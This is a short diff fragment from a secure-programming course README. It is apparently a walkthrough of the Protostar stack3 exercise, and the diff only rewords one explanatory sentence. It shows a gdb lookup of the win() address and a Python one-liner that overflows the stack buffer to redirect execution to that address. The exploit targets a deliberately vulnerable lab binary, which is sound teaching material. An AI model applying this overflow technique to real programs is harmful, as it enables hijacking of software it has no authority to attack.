marianoktm/SECPROG-Unisa/README.md

 $1 = {void (void)} 0x8048424 <win>
 ```

 So the `win()` function is located at `0x8048424`.
-Now we can use the script we used countless times, writing this address in little endian:
+Now we can use the same technique we've used before, writing this address in little endian format:

 ```
 user@protostar:/opt/protostar/bin$ python -c "print('a'*64 + '\x24\x84\x04\x08')" | ./stack3